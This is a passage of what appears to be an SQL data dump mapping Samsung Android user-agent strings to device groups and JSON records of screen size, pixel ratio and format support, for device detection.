Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G398FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G611F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G611FF) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G611M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G611MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G885F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G885Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G8870) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G892A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G892U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G930F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/* (KHTML, like Gecko) Chrome','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G950N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G950U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G950W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G9550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G955F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G955N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G955U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G955U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G955W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G960N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G960W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G9650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G965F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G965N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G965U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G965U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G965W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G9700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G970U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G9730) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G973F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G973N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G973U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G973U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G973W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G9750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G975W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G977B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G977N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-G977U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J260A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J260AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J330F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J330FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J330G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J337A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J337P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J337R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J337U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J337V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J337VPP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J337W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J400F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J400G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J400M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J415FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J415G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J415GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J530FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J530G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J530GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J530Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SM-J600GF) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 